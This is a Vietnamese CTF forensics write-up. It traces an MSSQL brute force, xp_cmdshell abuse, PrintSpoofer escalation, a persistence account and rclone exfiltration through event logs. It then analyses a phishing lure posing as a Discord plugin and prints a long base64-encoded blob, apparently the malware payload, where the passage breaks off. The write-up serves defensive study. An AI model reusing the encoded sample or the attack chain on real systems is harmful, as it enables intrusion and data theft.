KMA CTF 5/2025
Analyzer
Description
Solution
Challenge này cho ta 1 file zip bao gồm 2 folder là hunting log và Windows event log và 1 đường dẫn Netcat để ta trả lời các câu hỏi mà author đưa ra sau khi đã phân tích
Đối với folder Windows event log mình dùng EvtxeCmd chuyển nó sang dạng json để thuận tiện hơn trong việc điều tra
1. Which account was successfully compromised by the attacker?
Quan sát các tiến trình đang chạy trong hunting log => pslist, ta thấy có 1 process tên là sqlservr.exe đang chạy chứng tỏ máy đang hoạt động như một máy chủ cơ sở dữ liệu SQL Server — cụ thể là Microsoft SQL Server đã được cài đặt và đang chạy trên hệ thống.
Tìm kiếm trên inetrnet ta dễ dàng nhận ra được vị trí chứa các log của sal server
Bây giờ thì lọc các sự kiện liên quan đến việc đăng nhập từ MSSQL
Từ kết quả đầu ra cho ta thấy có hàng loạt thông báo đăng nhập không thành công đến tài khoản sa từ ip 192.168.174.134 và eventID là 1845
=> Bước đầu xác định tài khoản này đã bị tấn công bruteforce từ 08:23:29 đến 08:25:01
sa
2. What technique from the MITRE ATT&CK framework did the attacker use to compromise the account?
T1110
3. How many failed login attempts were recorded?
Sử dụng grep với ID “18456” và dùng option wc -l để đếm số lượng
1
2
3
┌──(kali㉿kali)-[~/Downloads/KMA CTF]
└─$ strings 20250511010610_EvtxECmd_Output.json | grep Application.evtx | grep -i "EventId\":18456" | wc -l
44904
4. When did the attacker first gain cmd access? (UTC+7) Ex: 2022-12-20_09:08:07
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
┌──(kali㉿kali)-[~/Downloads/KMA CTF]
└─$ strings 20250511010610_EvtxECmd_Output.json | grep Application.evtx | grep -i "cmd" | jq
{
"PayloadData1": "Configuration option xp_cmdshell changed from 0 to 1",
"MapDescription": "MSSQLSERVER Configuration change",
"ChunkNumber": 79,
"Computer": "WIN-M0LS22T4EKH",
"Payload": "{\"EventData\":{\"Data\":\"xp_cmdshell, 0, 1\",\"Binary\":\"61-3C-00-00-0A-00-00-00-10-00-00-00-57-00-49-00-4E-00-2D-00-4D-00-30-00-4C-00-53-00-32-00-32-00-54-00-34-00-45-00-4B-00-48-00-00-00-07-00-00-00-6D-00-61-00-73-00-74-00-65-00-72-00-00-00\"}}",
"Channel": "Application",
"Provider": "MSSQLSERVER",
"EventId": 15457,
"EventRecordId": "1011088",
"ProcessId": 0,
"ThreadId": 0,
"Level": "Info",
"Keywords": "0x80000000000000",
"SourceFile": "Y:\\KMA CTF\\eventlog\\Logs\\Application.evtx",
"ExtraDataOffset": 0,
"HiddenRecord": false,
"TimeCreated": "2025-03-09T08:37:05.8173796+00:00",
"RecordNumber": 1011088
}
Dòng log này cho thấy rằng cấu hình bị thay đổi của tùy chọn xp_cmdshell có nghĩa là xp_cmdshell đã được bật (0->1)
1
xp_cmdshell chính là một "công cụ" trong SQL Server cho phép thực hiện các lệnh hệ thống từ trong SQL Server. Khi tính năng này được bật, bạn có thể chạy các lệnh giống như khi sử dụng Command Prompt (cmd.exe) của Windows, chẳng hạn như:
=> Đây là dấu hiệu cho thấy có thể đã có một hành động khai thác để mở rộng quyền truy cập hoặc điều khiển hệ thống, vì việc bật xp_cmdshell có thể được sử dụng để chạy các lệnh cmd hoặc các lệnh hệ điều hành khác.
Vì câu hỏi yêu cầu múi giờ thứ 7 nên ta cộng thêm 7 giờ vào thời gian
2025-03-09_15:37:05
5. What is the path to the executable file that the attacker used for privilege escalation?
Với câu hỏi này mình sẽ phân tích từ file All Windows.Detection.Amcache.csv -> thường là file xuất từ Amcache – một thành phần của Windows dùng để ghi lại thông tin chi tiết về các chương trình đã được thực thi trên hệ thống (ngay cả khi nó đã bị xóa).
QUan sát cột EntryPath, có 1 đặc điểm là hầu hết các tệp thực thi đến từ thư mục hệ thống. Ngoài ra cũng có 1 vài tệp thực thi rất đáng ngờ ở folder public
Dựa vào blog này
Theo đó PrintSpoofer là một công cụ khai thác (exploit) trên Windows (named pipe - một cơ chế trong Windows dùng để các tiến trình giao tiếp với nhau.), được sử dụng để leo thang đặc quyền từ user (hoặc service account) lên System, bằng cách lợi dụng một lỗ hổng trong Print Spooler API.
-> Nếu attacker có quyền SeImpersonatePrivilege (thường có trên các dịch vụ đang chạy dưới tài khoản NETWORK SERVICE, LOCAL SERVICE, v.v.). Họ có thể sử dụng PrintSpoofer để mạo danh token SYSTEM và mở cmd.exe với quyền SYSTEM. 
Vậy nên đáp án cho câu hỏi này là c:\users\public\printspoofer64.exe
6. What account did the attacker create to maintain persistence?
Sau khi leo thang lên quyền SYSTEM, attacker tạo 1 user mới để tạo cơ chế persistence giúp quay lại dễ dàng hơn và tránh các công cụ giám sát.
Để biết được các tài khoản nào mới được tại ta có thể tìm theo event ID của nó
Payload : strings 20250511010610_EvtxECmd_Output.json| grep -i "eventID\":4720" | jq
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
{
"PayloadData1": "Target: WIN-M0LS22T4EKH\\admin (S-1-5-21-522953191-1411890807-4202804633-1001)",
"UserName": "WORKGROUP\\WIN-M0LS22T4EKH$ (S-1-5-18)",
"MapDescription": "A new account was created",
"ChunkNumber": 19,
"Computer": "WIN-M0LS22T4EKH",
"Payload": "{\"EventData\":{\"Data\":[{\"@Name\":\"TargetUserName\",\"#text\":\"admin\"},{\"@Name\":\"TargetDomainName\",\"#text\":\"WIN-M0LS22T4EKH\"},{\"@Name\":\"TargetSid\",\"#text\":\"S-1-5-21-522953191-1411890807-4202804633-1001\"},{\"@Name\":\"SubjectUserSid\",\"#text\":\"S-1-5-18\"},{\"@Name\":\"SubjectUserName\",\"#text\":\"WIN-M0LS22T4EKH$\"},{\"@Name\":\"SubjectDomainName\",\"#text\":\"WORKGROUP\"},{\"@Name\":\"SubjectLogonId\",\"#text\":\"0x3E7\"},{\"@Name\":\"PrivilegeList\",\"#text\":\"-\"},{\"@Name\":\"SamAccountName\",\"#text\":\"admin\"},{\"@Name\":\"DisplayName\",\"#text\":\"%%1793\"},{\"@Name\":\"UserPrincipalName\",\"#text\":\"-\"},{\"@Name\":\"HomeDirectory\",\"#text\":\"%%1793\"},{\"@Name\":\"HomePath\",\"#text\":\"%%1793\"},{\"@Name\":\"ScriptPath\",\"#text\":\"%%1793\"},{\"@Name\":\"ProfilePath\",\"#text\":\"%%1793\"},{\"@Name\":\"UserWorkstations\",\"#text\":\"%%1793\"},{\"@Name\":\"PasswordLastSet\",\"#text\":\"%%1794\"},{\"@Name\":\"AccountExpires\",\"#text\":\"%%1794\"},{\"@Name\":\"PrimaryGroupId\",\"#text\":\"513\"},{\"@Name\":\"AllowedToDelegateTo\",\"#text\":\"-\"},{\"@Name\":\"OldUacValue\",\"#text\":\"0x0\"},{\"@Name\":\"NewUacValue\",\"#text\":\"0x15\"},{\"@Name\":\"UserAccountControl\",\"#text\":\", %%2080, %%2082, %%2084\"},{\"@Name\":\"UserParameters\",\"#text\":\"%%1793\"},{\"@Name\":\"SidHistory\",\"#text\":\"-\"},{\"@Name\":\"LogonHours\",\"#text\":\"%%1797\"}]}}",
"Channel": "Security",
"Provider": "Microsoft-Windows-Security-Auditing",
"EventId": 4720,
"EventRecordId": "1778",
"ProcessId": 656,
"ThreadId": 4100,
"Level": "LogAlways",
"Keywords": "Audit success",
"SourceFile": "Y:\\KMA CTF\\eventlog\\Logs\\Security.evtx",
"ExtraDataOffset": 0,
"HiddenRecord": false,
"TimeCreated": "2025-03-09T09:30:15.2545143+00:00",
"RecordNumber": 1778
}
admin
7. What tool did the attacker use for data exfiltration?(lowercase)
Tìm kiếm các payload được thực thi trên powershell ta thấy có 2 file được giải nén nhiều lần là master.zip và rclone.zip
Payload : strings 20250511010610_EvtxECmd_Output.json| grep -i "Powershell.evtx" | jq '.PayloadData1'
Theo blog của
SymantecSymantec Enterprise -> rclone là một công cụ dòng lệnh mã nguồn mở dùng để đồng bộ hóa, sao chép và quản lý dữ liệu giữa hệ thống tệp cục bộ và các dịch vụ lưu trữ đám mây. Bao gồm các tính năng như : Mã hóa, tương thích với nhiều hệ thống đám mây … Vì vậy nó thường được attacker sử dụng để tuồng data ra ngoài 
rclone.exe
Flag
FLag : KMACTF{k1ng_of_analysis_l0g}
Forever 3.14
Description
Solution
Bài này cung cấp cho ta 2 file: 1 file eml và 1 file memory dump.
Phân tích file eml trước, mình thấy nó đính kèm 1 file zip.
Giải nén bên trong có 1 file txt hướng dẫn cài đặt và 1 file nén nữa, tuy nhiên nội dung file txt khá là sus vì nó yêu cầu người dùng phải chạy dưới quyền admin
1
2
3
4
5
zip password: betterfordiscord
1. Run the exe file with admin right.
2. Open discord with admin right to load the plugin.
Tiếp tục giải nén file 7z kia với mật khẩu là betterfordiscord ta thu được 2 file là Plugin.exe và Config.sys
Dùng die, ta có thể xác định được file được đóng gói thành file exe bằng PyInstaller
Tiến hành decompile nó với PyInstaller Extractor và PyLingual
1
2
3
4
z = '4wAAAAAAAAAAAAAAAAAsAABAAAAAc3paAABkAGQBbABaAGQAZAFsAVoBZQJkAmQDgwKPDloDZQOgBKEAWgVXAGQBUQBSAFgAZQGgBmQEoQFaB2UBoAZkBaEBWghkBqAJZAdkCIQAZQplC2UFgwGDAUQAgwGhAVoMZAmgCWQKZAiEAGUIRACDAaEBWg1lAmUNZAuDAo8QWgNlA6AOZQyhAQEAVwBkAVEAUgBYAGQMWg9lD2QBZAFkDYUDGQBaD2QOZA9kEGQRZBJkE2QUZBVkFmQVZBFkFWQXZBhkFWQZZBpkEWQVZBNkFGQVZBlkFWQbZBVkE2QUZBVkGWQVZBFkFWQTZBRkFWQZZBVkEWQVZBNkFGQVZBlkFWQRZBVkE2QUZBVkGWQVZBFkFWQTZBRkFWQZZBVkEWQcZBNkFGQVZB1kEWQeZB9kE2QgZCFkImQjZCRkF2QlZCZkI2QnZChkKWQnZCpkK2QsZC1kLmQvZDBkMWQyZDNkNGQ1ZDZkN2Q4ZDJkK2Q5ZDpkL2Q7ZBBkMmQ8ZD1kOmQ+ZD9kQGQyZC9kLWRBZEJkQ2REZBFkRWQSZBVkEWQVZBNkFGQVZBlkRmRHZEhkQmRJZEpkS2RMZE1kSmROZE9kIGRQZFFkUmRTZFRkVWRMZFZkSmRXZExkLWROZFhkWWRaZCpkUWQdZFpkW2RcZF1kXmRKZE5kT2RXZCtkQGRfZGBkYWRiZExkY2RbZGRkXWRlZGZkUWRnZBhkIGRYZFVkaGRKZEtkTGRNZEpkaWRPZGpkUGRRZFJka2ReZCVkXWRWZEpkV2RMZGxkaWRpZGdkJGQqZFFkHWRtZG5kb2RdZBpkSmROZE9kcGRxZDNkcmQgZGFkYmRMZBlkFWQRZBVkE2QUZBVkGWQVZBFkFWQTZBRkFWQZZBVkP2RbZBNkFGRBZHNkdGQRZF1kdWQcZHZkGWQVZBFkFWQTZBRkFWQZZGdkEWR3ZCpkeGR5ZB1kHWQRZBRkE2QUZBVkemQVZBFkFWQTZBRkFWR7ZHxkEWQVZBNkeWQVZBlkFWQRZBVkfWR+ZBVkGWQVZBFkbGQTZBRkFWR/ZBVkEWR0ZBNkFGQVZBlkFWQRZBVkHGQUZBVkGWQVZBFkFWQTZBRkgGQZZBVkEWSBZBNkFGQVZBlkFWQRZHlkE2QsZBdkGWQVZIJkFWQTZBRkFWQZZBVkgmQVZBNkFGQVZBlkFWQRZBVka2QUZBVkGWQVZBFkFWRrZBRkFWQZZBVkEWQVZBNkFGQVZBlkbGQRZBVkE2QUZBVkGWQVZBFkFWQTZBRkg2QRZBVkEWSEZBNkFGQVZBlkhWQRZBVkdGQUZBVkGWQVZD9kFWQTZIZkF2QZZBVkEWQVZBNkFGQVZBlkFWQRZBVkS2QUZBVkh2QVZBFkFWQqZCNkFWQZZIhkEWQVZBNkFGQVZBlkFWQRZBVkE2QUZBVkGWQVZBFkFWQTZBRkFWQZZBVkEWQVZBNkFGQVZBlkiWRDZBVkE2RwZBdkGWQVZBFkFWQTZBRkFWQZZBVkEWQVZIpkFGQVZCZkFWQRZBVkE2QUZBVkGWQVZBFkFWQTZBRkFWQZZBVkEWQVZBNkFGQVZBlkFWQRZBVkE2QUZBVkIWSLZEJkjGQ4ZBRkFWQZZFVkgmQVZBNkFGRsZBlkFWQRZBRkE2QUZBVkFmQVZBFkFWQTZBRkFWQZZBVkEWQVZBNkFGQVZBlkOmQRZBVkjWSOZCxkj2QwZJBkMGQTZBRkkWSSZBVkEWQVZIpkFGQVZBlkH2QRZBVkE2SBZBVkGWQVZBFkFWQTZBRkFWQZZBVkEWQVZBNkFGSTZBlkFWQbZENklGQnZItkNGQVZBFkFWR9ZHxkFWQZZBVkG2QVZBNkFGR5ZBlkFWQRZJVkE2QUZBVkGWQVZBFkFWQTZBRkFWQZZBVkEWQVZJFkFGQVZJZkQ2Q3ZEFkl2R2ZDBkGWQVZExkF2QTZBRkFWRyZBVkEWQVZG1kFGQVZBlkmGQRZBVkE2QUZBVkGWQVZBFkFWQTZBRkFWQZZBVkG2QVZBNkcGRDZJlkJ2QvZDNkE2QUZBVkJmQVZBFkFWQTZCxkFWQZZBVkmmQVZBNkFGRVZBlkFWQRZBVkE2QUZBVkGWQVZBFkFWQTZBRkFWQuZBVkEWSTZJtkhWScZJ1kN2SeZBVkE2SfZBVkGWQVZBFkiGQTZBRkFWR/ZBVkEWQVZINkFGQVZBlkFWQRZBVkE2QUZBVkGWQVZBFkFWQTZHBkFWQZZDlkEWQVZBNkFGQVZBlkFWQRZBVkE2QUZBVkGWQVZBFkFWQTZBRkFWQZZBVkEWQVZBNkFGQVZBlkFWQRZBVkE2QUZBVkGWQVZBFkFWQTZBRkFWQZZBVkEWQVZBNkFGQVZBlkFWQRZBVkE2QUZBVkGWQVZBFkFWQTZBRkFWQZZBVkEWQVZBNkFGQVZBlkFWQRZBVkE2QUZBVkGWQVZBFkFWQTZBRkFWQZZBVkEWQVZBNkFGQVZBlkFWQRZBVkE2QUZBVkGWQVZBFkFWQTZBRkFWQZZBVkEWQVZBNkFGQVZBlkFWQRZBVkE2QUZBVkGWQVZBFkFWQTZBRkFWQZZBVkEWQVZBNkFGQVZBlkFWQRZBVkE2QUZBVkGWQVZBFkFWQTZBRkFWQZZBVkEWQVZBNkFGQVZBlkFWQRZBVkE2QUZBVkGWQVZBFkFWQTZBRkFWQZZBVkEWQVZBNkFGQVZBlkFWQRZBVkE2QUZBVkGWQVZBFkFWQTZBRkFWQZZBVkEWQVZBNkFGQVZBlkFWQRZBVkE2QUZBVkGWQVZBFkFWQTZBRkFWQZZBVkEWQVZBNkFGQVZBlkFWQRZBVkE2QUZBVkGWQVZBFkFWQTZBRkFWQZZBVkEWQVZBNkFGQVZBlkFWQRZBVkE2QUZBVkGWQVZBFkFWQTZBRkFWQZZBVkEWQVZBNkFGQVZBlkFWQRZBVkE2QUZBVkGWQVZBFkFWQTZBRkFWQZZKBkoWSiZFdkMWSjZCZkFWQRZBVkV2SkZKVkUmSmZBFkFWRXZCNkp2Q3ZKhkqWSVZKpkFGQVZBlkVmSrZBdkWWSsZG9kGWQVZBFkgmRRZK1kLWSuZK9kNWQjZBNkFGSCZLBkbmR6ZItksWStZFtkfGRfZLJkqGSzZIpkW2R8ZLRkTmSoZF5ksGSFZHxkrWROZFxkXmSwZIRkN2SoZD5klWRXZLVkXGQzZJVkN2QtZHJkaWSVZC5ktmQmZC1kcmRpZJVkEWQtZLdkbmSGZHdkqGQzZJVke2S4ZFlkEmSPZLlkqGQ+ZJVkKmRlZIJksGSPZFZkuGRZZBJkj2S6ZLhkbGS7ZLNkYGS4ZFVku2S8ZL1kvmRpZJVkTmQoZBFkFWQTZJpku2QzZJVkP2QAZL9kcmQRZBlkFWROZLpkJWSwZIRkwGTBZA9kEWQTZBRkLWTCZKBkemTDZBdkxGROZMVkFWQRZBpkAGQUZBVkGWQtZKFkb2SGZMZkFWQZZBVkTmS2ZDJkx2TIZBlkFWQRZC1kyWRdZBxkGWQVZBFkymQyZCpkvWS/ZL1kZmS9ZDJki2R2ZFVkEWSpZBVkE2QUZBVkGWQtZJVkr2SWZMtkFWQZZDtkgmQtZGFkZmRsZLhkzGQqZABkF2QuZBdkzWQtZCpkX2RrZM5kz2SVZBVkEWS9ZDJktWRWZNBkVWSUZK1kOGSSZFZksWQXZJBkVWQPZBxkF2RlZNFk0mTHZABkdmRFZJdkF2QRZBVkE2S1ZFZk02RVZKJk1GRJZHxkFWQZZL9kyGTUZKtkfGQVZBlkgmRRZLRkV2RjZKdkgmTKZGlkumRDZLVkVmTTZFVk1WSCZBNkFGQVZNZk12QmZIJkkGRmZC1kWmSnZHtk2GRQZH5kFWQZZC1kt2S8ZIZkyGQtZGBki2R6ZGxkV2SpZJ5kEmQ6ZLJkaWRXZGNko2TEZC1koWTGZCVkpGRZZHxkX2TMZF5kHGQUZBVk2WS0ZGxk2mSwZBRkFWQZZNRksmSlZBNkFGQ4ZABk22Q+ZJVkkWRwZGhkmGRWZHdkY2TcZBRkFWQZZIJklGRPZBNkFGQVZIlkpWSNZN1kE2QUZBdkGWQVZBFk1GQsZN5kFWQZZNpkJmSLZN9kx2TgZENkFWQRZNRkxWTRZBVkGWTUZMZkgWQTZBRkLWSuZMFk4WQRZBNkFGQtZK5kr2RBZBFkE2QUZNRk4mTjZBFkFWTkZK1kO2QfZNRksGSlZBNkFGTaZJZki2RhZC1kJ2TEZLVkxWQVZBFkLWQnZBFknWTFZBVkEWTUZDRkqmQVZBlkSGTIZOVk3GQUZBVkf2QVZBFkFWSRZDpkAGRAZNBkzGRLZOJkFGQVZC5k2mSJZDtkSmTHZINkOmQVZBFkLWQ7ZNxkLWRaZMVkEWSLZIZktWS6ZOZk1GSnZHRkE2QUZNpklmSLZMRkoGQ7ZINkXmR/ZBVkEWQVZGhkpGSKZDdkumTnZKBkO2QRZF1kvmQVZBFkuGQXZMpkAGR3ZFtk6GQVZBNkrmQXZBlkFWQRZL9kbWQjZLRkN2S6ZI9klWSKZLVkumRlZJVkGWQtZDtkNWSVZDdkLWTSZKdkKmRlZLJkzWRNZOlkFWQTZBRk1GRTZMRkEWQVZDVkKmS9ZL9kLWS3ZLxkhmTIZE5kN2RWZERk6mSRZOtk4mTCZKVkyGRDZBNkFGTXZJZkyWQUZLZkn2S1ZLpk5GSVZBtkLWQPZF1k6mSMZMpkiWRSZHJk3mSjZEVkFWQRZNRk7GTRZBVkGWQ4ZEhk22ReZLBkOmRaZMtknGS2ZBNkFGR5ZHBktmTMZHpkzmQUZBVk7WRdZOdkFWQTZMdkTWSmZBVkEWRWZO5kiGS2ZBlkFWQRZDhk72THZEhkI2QVZBFktmTlZHBkOGTUZNRkE2R0ZBNkFGSCZGNkwGTMZLhkzmQUZBVkwmTKZPBkIGRUZMFkFWQZZBVkzGTEZOJkFGQVZGhkEGRmZC1kO2RdZC1kYGTDZGFkoGRyZHBk6WRgZIRkgmQtZHJktWTxZDZkTmSyZGlkV2RjZKNkLmQ9ZKFkZ2Q7ZNRkoGTCZFlklGStZLpkmmS+ZDJk8mQyZBVkE2QvZMRkfGS0ZNVkq2QTZBRkFWSuZDlkiWRWZHRkfmRyZC5kLWShZKVkXmTjZBVkGWQtZJRktGS6ZN5kXGTJZBdk8GTxZBdkxGS9ZPNkFWQRZLpkmGSpZLxkEmTqZJRk7mRZZLdkYGQZZBVkEWSgZDtkg2S6ZGdkPWShZIpk0WRiZPRkwGQAZKFkwGRyZGlklWTeZNdkJmSCZEJk9WQVZBlkFWRlZLpkxWSkZExkNWS6ZPZk1GSIZGtkAGTAZLpkSGSoZF5ksGTqZFpkAGSqZDtkUmSsZLRkcGQyZGVkumTFZCNkrWQ1ZLpk9mTUZG9ka2QAZMBkLWSUZNVkWWTgZEpk7WTtZPdkAGQXZLVkumR3ZJtkeWQVZBNktWTXZJZki2S7ZKBkO2SDZLZk+GQ9ZKFkimQXZMRkmWTzZBVkEWTXZBdkdmSlZFpkAGTnZDtk+WSyZLpk92S6ZFJkPWQ7ZKJk1GRsZPRkiWQAZDtk3GSoZDNklWSmZNdkn2R2ZH9kN2S6ZMhkt2TTZBRkFWQ3ZNdkJmQ7ZM5kl2TDZJhkv2SCZKBkO2SDZLpkZ2Q9ZKFkimQXZMRk0WTzZBVkEWS6ZJhkqWS8ZBJk6mTwZHRksWRfZKhk5GSVZKZkumTLZLVkumTkZJVkLmQtZA9kXWSTZHZksmSTZLJky2S1ZKhk5GSVZN5kLWRyZHZklWR7ZE5kTmRWZBRkMmQ9ZMJkHGShZIZkV2SkZFlkWmTHZKpkO2TOZMdkqWSYZBVkEWSgZDtk+mS6ZPBkLWShZIpkV2SkZLxkEmTqZE5kumQ4ZLBkxWQ3ZFZk7mQ6ZHNkzmSpZOxkAGSJZL1kMmQqZJNki2QtZNJko2QqZLVkumQTZLZkXWQAZL9k+mT7ZBlkFWROZLpk72QYZMFkY2T7ZBFkFWQXZMRktGSOZBVkEWQtZDtkhmReZENkgWQRZLRkV2RjZKdkxGQ+ZE5kAGTuZCBk+2QZZBVkTmSoZCVksGTxZDdkVmREZMVkVGSlZBVkGWQVZIlkwWSYZCFkFWQZZNdkJmSLZOJkuWR5ZBlkFWQRZLFkTGS1ZFxk/GTPZLZkFWQTZMdkUWQZZBVkEWQtZDtkaWSVZBFkLWS3ZKVkMWRhZBVkGWQtZP1kbmSGZPxkLWRaZLRk3mQtZHJk3mT0ZIdkFWQRZC1kO2TeZGlkRWQVZBFkLWRyZN5kSGTjZBVkEWQtZDtkaWSVZC5kLWS3ZKVk72SfZBVkGWRIZMhkc2T6ZBRkFWRDZIFkEWS0ZL5k3mSpZONkFWQRZBdkE2QUZBVkiWSlZF5kkmQTZBRkF2QZZBVkEWQaZNVkFGQVZBlkLWSLZLRkE2S1ZFxk/GT+ZN1kFWQTZLVkSGQWZBdkmmQVZBNkFGQaZKZkFWQRZBVkV2T/ZLRkGWQtZKFkr2SSZMVkFWQZZC1kt2SgZMdkMmQaZKZkFWQRZBVkV2T/ZLRkmGQtZKFkr2QTZL5kFWQZZC1kt2SgZMdkMmQtZK5kr2S2ZOdkE2QUZNRkwGQTZIlkAGQ1ZLVkVmTTZMVkomS9ZJFkuGRpZIhkLWTSZKNkkWS1ZLpkE2QAZEVkU2TNZBRkFWQ3ZLpkwmQcZBNkFGQVZHxkAGS1ZLZkn2S1ZFxkJ2SVZMlkLWQ7ZKJkAGQyZFxkpWQVZBNktWTXZJZki2SYZC1kD2QpZJVkEWQVZE5kXGQlZLBkKGQ3ZLpknWSVZI1ksmS6ZOZkLWS3ZKBkhmR3ZKBkwpABZABkTmRcZCVksGSIZDdkqGRlZJVkXWQjZF9kN2SoZI9klWQqZBhkwWSkZMhkEWQVZBdk+mRWZMBkeWQzZN9kV2RjZKdkLmQbZLhkPmTLZCpkvWS/ZC1kt2S8ZIZkRWSZZDdkumREZC1kD2QTZOpkN2S6ZMhkOmSDZBRkFWQ3ZGJkdZABZAFkI2RhZKRk42QVZBFkLWRPZPZkO2RlZC1k0mScZGtkFGQtZK5kDmSCZABkv2STZMhkGWQVZE5kumRiZHlkLWRgZFtk5mQAZL9ksmTIZBlkFWShZLRkV2QWZFtkTGQAZEVkLWTNZBRkFWTCZLRkTmRcZGRkRWQtZNFkW2TmZABkv2RwZMhkGWQVZKFkW2RQZLVkXGTWZGdkTmRKZKpkMmQtZHxkW2TEZC1ksWROZGdkN2S2ZCpkLWRUZBhkAGTAZABkiWQAZBNkFGQtZIFkSmROZE1ksZABZAJkJmRFZKRk3WQVZBNktWR6ZM1kLWRsZG5kYWS1ZKhkd2T+ZLBkFWQTZLVkumTkZJVkP2QtZCFk+WQtZGBkpWT2ZB1kE2QUZC1kWmSnZKaQAWQDZMtktWRcZPxk9WTqZBVkE2S1ZABkeWT5ZHRkFWQTZCpkvWQ3ZFxkFGQ2ZPZkFGQVZIpkeWTeZBVkE2S1ZFxkd2Q7ZOpkFWQTZPZkLWSuZKVk1mSmZBNkFGTKZDdkVmREZFVk0WT4ZABkwGQAZE5kVmTVZLBk1GRKZABkiWQAZFdkY2TxZH9kLWTSZKdkXWT2ZL1kN2RWZERkVWTRZFFkxGQZZBVklGS0ZDhktmScZDdkumT7ZH9kimQUZBVkGWQtZKFkLWTVZOJkpWQ3ZHpkTGSLZCJkI2S0ZExkLWRsZN9kRGRDZKZkGWQVZNZka2S9ZK1kLWRaZKdke2TKZHFkfmS/ZJtkvWRmZL1kV2RjZKNkgmTUZIVkxGQTZBRk12SWZItk6WTUZLxk0WQVZBlkv2R0ZNRkpGTBZBVkGWS6ZExk1GR2ZMFkFWQZZNdkJmSLZMdkOmS0ZL1kxGTMZGNk4mQUZBVkrGQXZE5kVmTzZPNkymQ3ZFZkRGRVZLFk7mTUZEVkF2QRZBVkQmStZIJkJWS0ZE5kVmTzZPNkymS/ZL1kZmQtZA9kE2RVZO1kVmTpZBVkE2S3ZLRkcGSBZHVktGTBZBVk1JABZARkxGQRZBVkQmStZDtkOmTUZCxkxGQTZBRkv2TQkAFkAmSqZC1kD2RdZFVkzWQtZNJko2RdZMdkPmQ6ZBVkEWTUZFhkwWQVZBmQAWQCZKpkLWQPZF1kVWTNZL1kZmS9ZFdkqWS8ZBJk8WROZKhk/WSwZGxkN2SoZJBklWRQZFtkLWRaZKNkYWQ9ZDtkv2Q9ZMJkZ2ShZIZkV2SkZNhk7WTAZHhkFWQTZKxktGRwZNFk0mTOZABkLmS7ZJBkumTsZLZk5WS1ZLpkImQtZKFkSGQXZMRkOWSfZBVkEWQtZDtkNGSVZMlkumRlZJVkYGS1ZLpk5GSVZKZkLWQ7ZH1klWQRZC1koWSLZIZkcGQtZFpkp2RhZBtk3mSDZHRkGWQVZE5kVmQUZPNk1GRJZHRkEWQVZORkrWSLZHtkLWT9ZK9k+WSOZBVkGWQtZNJkp2RdZM5kSmQjZBVkEWTUZOpkfGQVZBlk12QmZDtkzmTHZE1kI2QVZBFkLWQPZF1kVWTNZC1k0mSjZF1kI2RfZO1k32R4ZBVkE2S1ZFZk02RVZNVkWGQcZBRkFWQ3ZFZkRGRVZORk7mQ7ZDqQAWQAZMhk+GRmZBRkFWSYZNRkN2QSZBNkFGTUZFhkdGQRZBVkQmStZDtkFmQyZCZkv2QiZMdkamQjZBVkEWTaZJ9kLmQhZHxkX2TMZHJkHGQUZBVkvWQiZFNkF2RXZGNkp2SCZMpkZmS9ZJFkuGQtZFpko2RhZIBkymRgZHVkGWQVZBFkumQZZC5kLmRaZOJkqmRyZKFkx2QXZCNkFWQRZNdkn2R2ZFWQAWQBZO5k1mSVZFdkl2SvZPVkdWQRZBVk0WR6ZHRkGWQVZJRktGS6ZHlkLWSuZK9k32R1ZBNkFGTUZJ9kdGQRZBVk5GStZItkIWQyZCZkv2SxZItkgmQtZKWQAWQAZOlkE2QUZC1kWmRSZIlkRGRZZC9kpWRwZHVkEWQVZFdkqWSlkAFkBWR1ZBFkFWSvZJpkyWR3ZH1kMmQVZBNktWSoZHdk4GQyZBVkE2SDZKVkKWR1ZBFkFWQAkAFkAWQXZDdkVmTuZDpkHmT2ZE1kd2QVZBFkFWTRZNRkFWQZZBVkZmS9ZFdkY2SjZGFkoGShZEpkNGQbZLVkGWQVZP9kvmTOZL9kUGTAZABk1mSMZFdkNmSvZIdklmSJZABkV2SXZMFkimRQZIlkAGRXZLtk3GQgZL5kP2RbZBNkFGQ7ZIxkGmR8ZHlkE2QUZHZkqmS4ZMRkO2SuZLJkkmSrZIJkWJABZARkImS1ZFZkq2TpZE5kEmSmZJpkaGR2ZHRkTmRcZMZk/WSgZK5k42T6ZC1kcmR0ZJVkNWR6ZIpki2RQZKSQAWQGZJJkoGSVZEpkb2TpZLpknGTxZOdkSmQlZB1ktGSZZPFkTmRWZI5k82S/ZBxktmSxZC1k5GS0ZDtkFmQyZCZkv2QiZGNkQmQSZBVkK2SBZL1krWS/ZHWQAWQCZKpkv2QcZDpktGS9ZHlkdWS0ZFdkY2SnZGFkymQbZGVkV2RjZKNkxGQ4kAFkAGTUZMFk0WQVZBlktmSxZNdkn2R2ZIdk2WTuZNZkxGRXZOFkwZABZAVk5WQRZBVkV2RjZKdkxGQ+ZKJkk2RAZLVkVmTQZDpkl2TLZFxkn2QVZBlkFWThZOxkOGTRZNpk+GQ7ZH5k1GTwZN5kFWQZZDhkg2TUZPRk3mQVZBmQAWQCZKpkLWQPZF1kOmSeZMpkZmS9ZDJktWRcZHdk4WS2ZBVkE2T2ZFZkeWQPZLZkFWQTZBRkymQ3ZKhkj2SVZNVkVGQtZK5kwmR6ZJNkpWQYZABkN2T1ZERktGTOZBRkFWTCZOxkIGTeZBNkFGQVZMBkwWQPZNFkE2QUZNdklmSLZPtkumTvZCZkHWSNZBJkEWQVZBNkx2SnZMBkAGSJZLZk5WS1ZFxk1mRnZLJkGmRDZNFkFWQZZNRki2SBZBNkFGQtZK5kDmTmZABkv2TtZMFkGWQVZE5kumQzZMdkFWQZZBVkTmRcZJBk3GSBZBlkFWROZLpk72ROZLZklmQAZEVkYmS/ZBRkFWQ3ZNdkJmSLZPlktWRWZI9klWQZZBVkV2SXZFxkSGSBZBFkFWRXZKRk4WQAZIFkEWQVZCVkpGRSZDdkqGRlZJVkimSyZLpkzWQtZP1kXGTRZNFkFWQZZC1kt2SgZIZk82QtZK5kDmTmZC1kcmSyZJVkxGS2ZF1kAGS/ZGdkwWQZZBVkTmS6ZORkhmSBZBlkFWROZFxkJWSwZIRkN2SoZJRk1GQTZBRkFWR8ZK1kTmRcZORkhmSBZBlkFWSyZBpkdmQUZBVkGWQtZNJktGTVZLVkqJABZAFk22QRZBVkE2THZINklWQVZBFkLWQ7ZKxkUmQWZBVkEWQtZHJkaWSVZFRkSGQ+ZJVkYGTEZBVkGWSTZMBkbmSGZDRkF2QZZBVkEWQAZ